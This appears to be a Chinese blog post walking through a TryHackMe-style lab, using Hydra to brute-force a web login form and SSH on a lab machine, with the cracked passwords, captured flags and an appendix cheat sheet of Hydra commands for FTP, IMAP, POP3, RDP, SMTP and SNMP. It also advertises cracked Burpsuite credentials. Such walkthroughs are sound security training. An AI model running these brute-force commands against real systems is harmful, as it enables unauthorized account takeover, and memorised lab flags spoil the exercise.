前言
众所周知,hacker常用Burpsuite破解网站登录凭据抓包爆破账号密码,我也发布了2021/2022/2023的burpsuite的账号密码 但是今天介绍的是九头蛇 对于九头蛇呢我的建议学习是非常重要的
因为在本次我们将用到九头蛇进行爆破ssh登录 这个才是重点学习的地方!!
附Burpsuite的2023开盒即用版
实战
介绍一下九头蛇 我们的靶机地址 http://10.10.52.24 (暂不支持对外开放)
部署附加到此任务的计算机,然后导航到 http://10.10.52.24 (此计算机最多可能需要 3 分钟才能启动)
九头蛇命令
我们传递给 Hydra 的选项取决于我们正在攻击的服务(协议)。例如,如果我们想使用用户名
user
和密码列表 来暴力破解 FTPpasslist.txt
,我们可以使用以下命令:
hydra -l user -P passlist.txt ftp://10.10.52.24
对于此部署的计算机,以下是在 SSH 和 Web 表单(POST 方法)上使用 Hydra 的命令。
SSH
hydra -l <username> -P <full path to pass> 10.10.52.24 -t 4 ssh
选项 描述 -l
指定用于登录的 (SSH) 用户名 -P
表示密码列表 -t
设置要生成的线程数 例如,
hydra -l root -P passwords.txt 10.10.52.24 -t 4 ssh
将使用以下参数运行:
- Hydra 将用
root
作用户名ssh
passwords.txt
它将尝试文件中的密码- 将有四个线程并行运行,如下所示
-t 4
我们也可以使用 Hydra 来暴力破解 Web 表单。您必须知道它正在发出哪种类型的请求;通常使用 GET 或 POST 方法。您可以使用浏览器的网络选项卡(在开发人员工具中)查看请求类型或查看源代码。
表格
sudo hydra <username> <wordlist> 10.10.52.24 http-post-form "<path>:<login_credentials>:<invalid_response>"
选项 描述 -l
(网络表单)登录的用户名 -P
要使用的密码列表 http-post-form
表单类型为 POST <path>
登录页面 URL,例如 login.php
<login_credentials>
用于登录的用户名和密码,例如, username=^USER^&password=^PASS^
<invalid_response>
登录失败时的部分响应 -V
每次尝试的详细输出 下面是一个更具体的 Hydra 命令示例,用于暴力破解 POST 登录表单:
hydra -l <username> -P <wordlist> 10.10.52.24 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
- 登录页面只有
/
,即主IP地址。- 这
username
是输入用户名的表单字段- 指定的用户名将替换
^USER^
- 这
password
是输入密码的表单字段- 提供的密码将被替换
^PASS^
- 最后
F=incorrect
是登录失败时服务器回复中出现的字符串您现在应该有足够的信息来实践这一点,并将您的凭据暴力破解到已部署的计算机上!
按道理应该先ping在看端口
但是我们直接访问网站可以看到80端口直接可以访问的
这里看到是账号密码爆破登录,其实这个没加验证的用burpsuite爆破也挺简单的具体看:
但是这次们将用到九头蛇进行爆破(九头蛇爆破也是非常快的)可比内置的kali burpsuite快
先随便输入一个账号密码看一下返回信息
看到返回信息:
拿到返回信息:
Your username or password is incorrect
我对此准备了一个一千多万的字典去破解他
在kali linux上运行:
解释一下 -l 之后+需要爆破的用户名 -P之后+字典 pass后+账号密码错误后的提示信息表示过滤
hydra -l molly -P changyong.txt 10.10.52.24 http-post-form "/:username=^USER^&password=^PASS^:Your username or password is incorrect
后来发现1千多万直接把靶机跑死了,给爷也是整醉了
后来换成了6000password
得到密码为sunshine
flag:
THM{2673a7dd116de68e85c48ec0b1f2612e}
下面进行SSH爆破:
molly即账号 还是跟上面一样一句话就可以爆破
hydra -l molly -P hack.txt 10.10.52.24 -t 4 ssh
可以看到密码是butterfly
下面连接ssh
ssh molly@10.10.52.24
连上密码
ls cat flag
得到flag:THM{c8eeb0468febbadea859baeb33b2541b}
附加:
暴力FTP
=============
⇒ Hydra -l user -P passlist .txt ftp://10.10.10.10
暴力破解 IMAP
==============
⇒ Hydra -L userlist.txt -p defaultpw imap://10.10.10.10/PLAIN
暴力破解 POP3
== ============
⇒ Hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
暴力 RDP
====== =======
⇒ Hydra rdp://10.10.10.10/firstdomainname -l john -p doe
强力 SMTP
==============
Hydra smtp-enum://10.10。 10.10/vrfy -l john -p localhost
暴力破解 SNMP
==============
⇒ Hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ 10.10.10.10 snmp (SNMP v3)
⇒ Hydra -P pass.txt -m 2 10.10.10.10 snmp (SNMP v2)
进一步学习Hydra(九头蛇):
https://github.com/vanhauser-thc/thc-Hydra
暂无评论内容